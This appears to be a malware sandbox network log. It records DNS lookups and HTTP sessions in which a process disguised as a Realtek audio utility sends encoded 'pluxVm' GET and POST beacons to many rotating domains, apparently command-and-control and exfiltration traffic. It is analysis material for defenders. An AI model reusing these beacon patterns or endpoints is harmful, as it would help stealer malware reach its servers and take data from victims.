                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.488898993 CET53639569.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:12.884244919 CET6234353192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.001126051 CET53623439.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.147017002 CET5199053192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.294316053 CET53519909.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.644059896 CET6091153192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.920598030 CET53609119.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:53.469088078 CET4916053192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.073628902 CET53491609.9.9.9192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:51:28.802572966 CET | 192.168.11.20 | 1.1.1.1 | 0x2d96 | Standard query (0) | www.88rtp.biz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:51:44.635790110 CET | 192.168.11.20 | 1.1.1.1 | 0xb1a1 | Standard query (0) | www.kubex.dev | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:51:58.382852077 CET | 192.168.11.20 | 1.1.1.1 | 0x6e0a | Standard query (0) | www.sido247.pro | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:12.161015987 CET | 192.168.11.20 | 1.1.1.1 | 0xd27b | Standard query (0) | www.glowups.life | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:25.736339092 CET | 192.168.11.20 | 1.1.1.1 | 0x6ade | Standard query (0) | www.epicurecooks.world | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:40.451524973 CET | 192.168.11.20 | 1.1.1.1 | 0x4298 | Standard query (0) | www.eichner.pro | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:54.135973930 CET | 192.168.11.20 | 1.1.1.1 | 0x1a97 | Standard query (0) | www.juewucangku.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:55.150578022 CET | 192.168.11.20 | 9.9.9.9 | 0x1a97 | Standard query (0) | www.juewucangku.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:09.851281881 CET | 192.168.11.20 | 9.9.9.9 | 0xe4c8 | Standard query (0) | www.nng83.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:24.160645008 CET | 192.168.11.20 | 9.9.9.9 | 0x7ef9 | Standard query (0) | www.brickhills.site | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:37.813925982 CET | 192.168.11.20 | 9.9.9.9 | 0xf4d1 | Standard query (0) | www.foggvdqutxzgea.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:45.983978987 CET | 192.168.11.20 | 9.9.9.9 | 0xc6e2 | Standard query (0) | www.goldbracelet.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:59.371551991 CET | 192.168.11.20 | 9.9.9.9 | 0xcd8e | Standard query (0) | www.0be.info | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:12.884244919 CET | 192.168.11.20 | 9.9.9.9 | 0x7114 | Standard query (0) | www.smartgov.shop | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:26.147017002 CET | 192.168.11.20 | 9.9.9.9 | 0x163e | Standard query (0) | www.hayaniya.org | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:39.644059896 CET | 192.168.11.20 | 9.9.9.9 | 0xeeee | Standard query (0) | www.dialogpriest.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:53.469088078 CET | 192.168.11.20 | 9.9.9.9 | 0xc451 | Standard query (0) | www.224466.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:51:28.924959898 CET | 1.1.1.1 | 192.168.11.20 | 0x2d96 | No error (0) | www.88rtp.biz | 88rtp.biz |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:51:28.924959898 CET | 1.1.1.1 | 192.168.11.20 | 0x2d96 | No error (0) | 88rtp.biz |  | 172.96.191.39 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:51:44.842542887 CET | 1.1.1.1 | 192.168.11.20 | 0xb1a1 | No error (0) | www.kubex.dev |  | 217.160.0.183 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:51:58.521397114 CET | 1.1.1.1 | 192.168.11.20 | 0x6e0a | No error (0) | www.sido247.pro | sido247.pro |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:51:58.521397114 CET | 1.1.1.1 | 192.168.11.20 | 0x6e0a | No error (0) | sido247.pro |  | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:12.279875040 CET | 1.1.1.1 | 192.168.11.20 | 0xd27b | No error (0) | www.glowups.life |  | 209.74.79.42 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:25.976707935 CET | 1.1.1.1 | 192.168.11.20 | 0x6ade | No error (0) | www.epicurecooks.world |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:40.563632965 CET | 1.1.1.1 | 192.168.11.20 | 0x4298 | No error (0) | www.eichner.pro |  | 89.31.143.90 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:55.503623009 CET | 9.9.9.9 | 192.168.11.20 | 0x1a97 | No error (0) | www.juewucangku.xyz |  | 8.136.96.106 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:52:55.808995008 CET | 1.1.1.1 | 192.168.11.20 | 0x1a97 | No error (0) | www.juewucangku.xyz |  | 8.136.96.106 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:09.968863010 CET | 9.9.9.9 | 192.168.11.20 | 0xe4c8 | No error (0) | www.nng83.top | nng83.top |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:53:09.968863010 CET | 9.9.9.9 | 192.168.11.20 | 0xe4c8 | No error (0) | nng83.top |  | 38.47.233.4 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:24.337733984 CET | 9.9.9.9 | 192.168.11.20 | 0x7ef9 | No error (0) | www.brickhills.site |  | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:37.922704935 CET | 9.9.9.9 | 192.168.11.20 | 0xf4d1 | Name error (3) | www.foggvdqutxzgea.xyz | none | none | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:46.117522955 CET | 9.9.9.9 | 192.168.11.20 | 0xc6e2 | No error (0) | www.goldbracelet.top |  | 172.67.201.49 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:46.117522955 CET | 9.9.9.9 | 192.168.11.20 | 0xc6e2 | No error (0) | www.goldbracelet.top |  | 104.21.36.239 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:53:59.488898993 CET | 9.9.9.9 | 192.168.11.20 | 0xcd8e | No error (0) | www.0be.info | 0be.info |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:53:59.488898993 CET | 9.9.9.9 | 192.168.11.20 | 0xcd8e | No error (0) | 0be.info |  | 173.0.157.187 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:13.001126051 CET | 9.9.9.9 | 192.168.11.20 | 0x7114 | No error (0) | www.smartgov.shop |  | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:13.001126051 CET | 9.9.9.9 | 192.168.11.20 | 0x7114 | No error (0) | www.smartgov.shop |  | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:26.294316053 CET | 9.9.9.9 | 192.168.11.20 | 0x163e | No error (0) | www.hayaniya.org | hayaniya.org |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:54:26.294316053 CET | 9.9.9.9 | 192.168.11.20 | 0x163e | No error (0) | hayaniya.org |  | 192.185.147.100 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:39.920598030 CET | 9.9.9.9 | 192.168.11.20 | 0xeeee | No error (0) | www.dialogpriest.online |  | 176.31.209.107 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:54:54.073628902 CET | 9.9.9.9 | 192.168.11.20 | 0xc451 | No error (0) | www.224466.top |  | 45.197.47.177 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49759 | 172.96.191.39 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:29.266508102 CET | 416 | OUT | GET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.88rtp.biz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:51:29.602164030 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:51:29 GMT
                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49760 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:45.033953905 CET | 671 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3TedFyftTWN0BV/QXnWkKql0OYTPkSmOEg==
Dec 3, 2024 14:51:45.238734961 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49761 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:47.747675896 CET | 691 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHtGkTvqWTSklwNOsgk173SY/B8+4J9gN1MX4ohQ4PVgELj2O8lxFN+n0Hr2wkQSp5v/GVfgPDksF7cKUTKnbUkpavrgdvpDCGhGmZ8zW4ZdQ6H0/r/55PWlxyKgDArRKHBuNjyKKViAJ55GKoqnmQnVZpc9B5l/ZkveqDm0WivP+p4=
Dec 3, 2024 14:51:47.973843098 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49762 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:50.465363026 CET | 2578 | OUT | POST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:51:50.465404987 CET | 5262 | OUT |
                                                                                                                                                                                                                                Data Ascii: iA0xarbQBHqhB7159R6my/a5TgEstveefNxRq1FV73VHAIYShzUn4EpIyx0E8438IDV435jZ6/3FmnsBZw+5p9U9FzTu5NphdrsMemEZRnUazUcCNzCxjwebvB58V/lmiUOyTy5Ed2qIEJdYEGij7TzRV/svsX1hphTzYUDz2WPriYzu0T74DPEv8DS7gHhL1lKbaz0CIC3zvAe9LvyBMtb9LC29NG4xsGquHIeJMNzkDBMgZT+
Dec 3, 2024 14:51:50.668787956 CET | 558 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:50 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49763 | 217.160.0.183 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:53.183054924 CET | 416 | OUT | GET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:51:53.376332045 CET | 745 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 601
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:53 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49764 | 84.32.84.32 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:51:58.737869024 CET | 677 | OUT | POST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkLXEIJOClyNcyzkVNrbC+B26WVrT22QzNiS9pBN1N1tuE1VJIlVyHm2UdPSoE3ByYugkZih0hwogPPAGgUH10hBqrfLA2iJP9KLwJCv/CBmvdqTZgbzCPUTj2m+VdWftpgxFTpMndspgN8kN3AgspbrXVEf1qckB1lRiZytVw/Eleg3H/HpncA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49765 | 84.32.84.32 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:01.472388983 CET | 697 | OUT | POST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AAzNH+9uAN1BVtuPVVGVVU+Hm66dLSoE3VyYrckZV13zQoiUfAEu0H10hBqrffu2iRP977wIjvgLhmgKaTZr7zOPUTR2jm/dUntpgBFTcwkXspmCcls4QgppLfae1rAuPc2wzc4EAZxzsYXaQOv9Fo8BCfP0emgneJ0inWcOUdW060=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49766 | 84.32.84.32 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:04.206541061 CET | 7734 | OUT | POST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AIzMxq9ojl1AVtuG1UhVVVkHie2dLWSE0tyKdokfk135QoiLPAFgUHs0hRurfPu2iRP95jwPyvgNhmvdqTNgbziPQ2k2iSFdEHtpEtFU+YkVMpkO8lO4Qt5pPGle235uMM291J6UEBMlOM6SiCFz1czf1Pu3+vOkbNYiESwfmxhj+XvPM7fNj7qBY6zSXuNDDsYEAICwvmy7Bgd1Uk3Hv+6DdACUBPHxi/fDmIpiL6MJnzaCkCg/0UshU2A1WwetLpEvSf5VxrhCmJJc5zA4uzjSgRb5SoRJu/SIqo7eGXLkKIXul+7dDPG4SbtMkaY0P4fan31BmxeNlxbkmALxtZPI+G/Hb4+Lysk/31YBbJjFd+gWvrkXThz43g481TydRyiRa+AUR0Yz2VToTx2lSBBGXzlgHvGp14QQ/ktjkxqlmLIBOiimM5WY9gPMWLynG5Ngi4unWPr5uIE34dtni6mP7lpMM+l0OreYHiRZF0K5e86CVxmVXYvj4cRC15MgDP4A8UOxJNZwK+xlFi0F8I5T2r09Zy8+qIRQS6IQKlZ8G/a0unrIBeq2DNtyi1RBhu5MOw6z0HQPSVBZJbIjnG20iFu0cE4qQZlktn/5IrUC6ePHXP5p6a2c9cL/Io0AiAyidtCTfdvKdYj4rRM99wl0cHtlahU/MtpbW28WkYHzE++Gt845YC3BRT/z+kE83w4w0yfMvtJcQk78oXvdjWw8cNHIqhmfRFRrna5WGZaiivrBBbRhj43O5hkJp7XW8ckbNyYzLlN5M91RgxjlHrw1Lvl4/uzGQEL1fb8q/wF3YYJefsQBGpxS17SHjVGpdGN+QuO27t7gw0Udd4mcFInvuyG9NOO25j5GqSDCEYis01vx51aGVjgCuw1PMar4zKTL5ZrkKUbbouzhRW4ScMHb32t/SbdszN10YolZnx0aXnsXcUNTblTlZCUFPq/4eYn9 [TRUNCATED]
Dec 3, 2024 14:52:04.206655025 CET | 112 | OUT
                                                                                                                                                                                                                                Data Ascii: 4WnHZLs9epGfvAv7kV4QKB/BJLNQDVwaRZW+ShHUOha8NF/MadQbEc6RBgYXMtn1xyWseyiRwtGj2Sv0e3Mo0pvlHuP+IolM2Lc3wQegE1a1Wg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49767 | 84.32.84.32 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:06.938968897 CET | 418 | OUT | GET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:52:07.150970936 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 9973
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Server: hcdn
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                x-hcdn-request-id: e11158232d6107c78d0906946e7d0c0b-asc-edge6
                                                                                                                                                                                                                                Expires: Tue, 03 Dec 2024 13:52:06 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49768 | 209.74.79.42 | 80 | 7488 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:52:12.453989029 CET | 680 | OUT | POST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.glowups.life
                                                                                                                                                                                                                                Referer: http://www.glowups.life/dheh/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=3L0sD6h+2VkiOb7PXuyCNdNMUAy6Hj2DhfKj0DYoft8tYrHFuJu19mefKhOVpKgZnXgbZFivH28v4evdt0eyTVzbAtsuViWVvNcdqsBhMenr8/foMvreNCxfkjRd3vJNkXjsGccIQzdOZ7iU4gE+WijhpLT7lqLVhCYdx5FxL2UDeFLyc/6QfGeHYkNy6rgAMg==
Dec 3, 2024 14:52:12.631900072 CET | 533 | IN | HTTP/1.1 404 Not Found
